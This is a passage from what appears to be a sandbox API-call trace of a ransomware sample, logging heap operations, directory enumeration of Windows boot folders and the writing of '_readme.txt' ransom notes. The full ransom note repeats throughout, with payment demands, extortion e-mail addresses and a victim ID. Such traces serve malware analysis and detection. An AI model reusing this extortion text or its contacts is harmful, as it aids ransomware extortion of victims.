dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0179.964] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0179.965] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0179.965] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0179.965] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac4ee0 [0179.965] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0179.965] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0179.965] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0179.966] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0179.966] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0179.966] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0179.966] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0179.966] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0179.967] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0179.967] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0179.967] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0179.967] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0179.968] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0179.968] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0179.968] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0179.968] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0179.968] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0179.969] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0179.969] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0179.969] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0179.969] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0179.969] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0179.969] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0179.969] PathFindFileNameW (pszPath="C:\\Boot\\en-US\\") returned="en-US\\" [0179.970] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7568 [0179.970] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0179.970] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0179.970] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7568 | out: hHeap=0x2c0000) returned 1 [0179.970] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0179.970] PathFindFileNameW (pszPath="") returned="" [0179.970] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7568 [0179.970] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759a0000 [0179.971] GetProcAddress (hModule=0x759a0000, lpProcName="SHGetFolderPathW") returned 0x75a25708 [0179.971] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x800) returned 0x2ade6e0 [0179.971] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x2ade6e0 | out: pszPath="C:\\Users\\kEecfMwgj") returned 0x0 [0179.972] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x810) returned 0x2ac4ee0 [0179.972] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0179.972] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0179.972] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76a8 [0179.972] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7568 | out: hHeap=0x2c0000) returned 1 [0179.972] FreeLibrary (hLibModule=0x759a0000) returned 1 [0179.973] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0179.973] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0179.973] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76a8 | out: hHeap=0x2c0000) returned 1 [0179.973] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76a8 [0179.973] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x81c) returned 0x2ac4ee0 [0179.973] PathAppendW (in: pszPath="C:\\Boot\\en-US\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\en-US\\_readme.txt") returned 1 [0179.974] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0179.974] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76a8 | out: hHeap=0x2c0000) returned 1 [0179.974] PathFileExistsW (pszPath="C:\\Boot\\en-US\\_readme.txt") returned 0 [0179.975] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x7d00) returned 0x2ae1ea0 [0179.975] lstrcpyW (in: lpString1=0x2ae1ea0, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" [0179.976] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd", lpString2="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" [0179.976] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac5768 [0179.976] CreateFileW (lpFileName="C:\\Boot\\en-US\\_readme.txt" (normalized: "c:\\boot\\en-us\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0179.977] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac5768 | out: hHeap=0x2c0000) returned 1 [0179.977] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae1ea0 | out: hHeap=0x2c0000) returned 1 [0179.978] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0179.978] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76a8 [0179.978] FindFirstFileW (in: lpFileName="C:\\Boot\\en-US\\*" (normalized: "c:\\boot\\en-us\\*"), lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x95683fe0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d5e380, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28d5e380, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2a05da8 [0179.978] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76a8 | out: hHeap=0x2c0000) returned 1 [0179.978] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x95683fe0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d5e380, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28d5e380, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0179.979] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x95683fe0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d5e380, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xe8216d3c, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x14c40, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0179.979] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x95683fe0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d5e380, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xc3080a8, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0xaa50, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0179.979] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x95683fe0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d5e380, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xc3080a8, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0xaa50, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 0 [0179.979] FindClose (in: hFindFile=0x2a05da8 | out: hFindFile=0x2a05da8) returned 1 [0179.979] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.980] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad75e0 | out: hHeap=0x2c0000) returned 1 [0179.980] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad75e0 [0179.980] PeekMessageW (in: lpMsg=0x2f9fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9fb74) returned 0 [0179.980] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76a8 [0179.980] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0179.980] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.981] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76a8 | out: hHeap=0x2c0000) returned 1 [0179.981] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76a8 [0179.981] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0179.981] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.981] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76a8 | out: hHeap=0x2c0000) returned 1 [0179.982] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76a8 [0179.982] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0179.982] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.982] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76a8 | out: hHeap=0x2c0000) returned 1 [0179.982] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76a8 [0179.982] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0179.983] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.983] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76a8 | out: hHeap=0x2c0000) returned 1 [0179.983] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76a8 [0179.983] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0179.983] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.984] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76a8 | out: hHeap=0x2c0000) returned 1 [0179.984] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76a8 [0179.984] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0179.984] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.984] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76a8 | out: hHeap=0x2c0000) returned 1 [0179.984] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76a8 [0179.984] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0179.984] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x2ade6e0 [0179.985] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.985] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0179.985] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76a8 | out: hHeap=0x2c0000) returned 1 [0179.985] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76a8 [0179.985] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0179.986] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.986] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76a8 | out: hHeap=0x2c0000) returned 1 [0179.986] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76a8 [0179.986] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0179.986] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.986] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76a8 | out: hHeap=0x2c0000) returned 1 [0179.986] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76a8 [0179.986] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0179.987] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.987] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76a8 | out: hHeap=0x2c0000) returned 1 [0179.987] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76a8 [0179.987] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0179.987] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.988] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76a8 | out: hHeap=0x2c0000) returned 1 [0179.988] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76a8 [0179.988] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0179.988] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.988] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76a8 | out: hHeap=0x2c0000) returned 1 [0179.988] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76a8 [0179.988] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0179.989] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.989] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76a8 | out: hHeap=0x2c0000) returned 1 [0179.989] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76a8 [0179.989] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0179.989] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.990] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76a8 | out: hHeap=0x2c0000) returned 1 [0179.990] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76a8 [0179.990] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0179.990] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.990] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76a8 | out: hHeap=0x2c0000) returned 1 [0179.990] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76a8 [0179.991] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0179.991] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.991] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76a8 | out: hHeap=0x2c0000) returned 1 [0179.991] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76a8 [0179.991] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0179.991] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.992] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76a8 | out: hHeap=0x2c0000) returned 1 [0179.992] PathFindFileNameW (pszPath="C:\\Boot\\es-ES\\") returned="es-ES\\" [0179.992] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0179.992] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0179.992] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0179.992] PathFindFileNameW (pszPath="") returned="" [0179.992] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759a0000 [0179.993] GetProcAddress (hModule=0x759a0000, lpProcName="SHGetFolderPathW") returned 0x75a25708 [0179.993] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x2ade6e0 | out: pszPath="C:\\Users\\kEecfMwgj") returned 0x0 [0179.993] FreeLibrary (hLibModule=0x759a0000) returned 1 [0179.993] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76a8 | out: hHeap=0x2c0000) returned 1 [0179.993] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0179.993] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7568 | out: hHeap=0x2c0000) returned 1 [0179.993] PathAppendW (in: pszPath="C:\\Boot\\es-ES\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\es-ES\\_readme.txt") returned 1 [0179.993] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0179.993] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7568 | out: hHeap=0x2c0000) returned 1 [0179.993] PathFileExistsW (pszPath="C:\\Boot\\es-ES\\_readme.txt") returned 0 [0179.995] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x7d00) returned 0x2ae1ea0 [0179.995] lstrcpyW (in: lpString1=0x2ae1ea0, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" | out: lpString1="ATTENTION!\r\n\r\nDon't 